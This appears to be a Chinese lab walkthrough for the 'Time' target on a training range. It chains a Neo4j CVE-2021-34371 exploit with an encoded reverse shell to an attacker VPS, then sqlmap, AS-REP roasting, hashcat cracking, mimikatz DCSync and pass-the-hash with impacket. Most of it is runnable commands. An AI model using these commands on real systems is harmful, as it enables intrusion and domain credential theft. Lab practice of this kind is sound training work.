春秋云境 - - Time靶场

春秋云境 - - Time靶场
先上fscan扫描

fscan.exe -h 39.99.233.234 -p 1-65535

发现开放端口和服务

开放了7474端口 是个Neo4j Browser服务
百度Neo4j Browser历史漏洞发现是### [CVE-2021-34371]
用rhino_gadget.jar工具来打

java -jar .\rhino_gadget.jar rmi://39.99.128.12:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" 


监听拿下shell
对目标IP进行资产探测

发现内网网段在172.22.6段
vps开启http服务
目标机下载fscan和agent

wget http://ip:8000/agent
wget http://ip:8000/fscan

fscan扫描内网

./fscan -h 172.22.6.0/24 -p 1-65535


扫描出来资产信息

1. `172.22.6.12 域控`
2. `172.22.6.25 域内机器`     
3. `172.22.6.36 当前机器`     
4.`172.22.6.38 某后台登录界面`

kali设置代理
访问172.22.6.38,发现是个web登录页面

bp抓包

POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.22.6.38/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://172.22.6.38
Connection: close
Upgrade-Insecure-Requests: 1
 
username=admin&password=123456

用sqlmap一把嗦

python sqlmap.py -r 1.txt --dump


把一些用户名注出来了
写个脚本把用户名提取出来保存为user.txt
保存为user.txt然后枚举未设置预认证的账号(这个东西默认是不关闭的,但当关闭了预身份验证后,攻击者可以使用指定用户向域控制器的Kerberos 88端口请求票据,此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回。因此,攻击者就可以对获取到的用户Hash加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码)

proxychains4 python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/


hashcat解一下

hashcat -m 18200 1.txt -a 0 ./rockyou.txt  --force

获取账号密码

zhangxin@XIAORANG.LAB:strawberry

rdp登录172.22.6.25

query user//查看在线用户

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

抓取密码

换这个账号登了一下,用BloodHound分析域内关系,发现这个用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限),借一张别人的图:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
我们就可以通过这个滥用直接攻击DC了,因为我们保留域管理员的访问权限了,所以直接dump哈希
上传mimikatz

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"


读取管理员hash
接下来就是hash传递

proxychains4 impacket-wmiexec  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值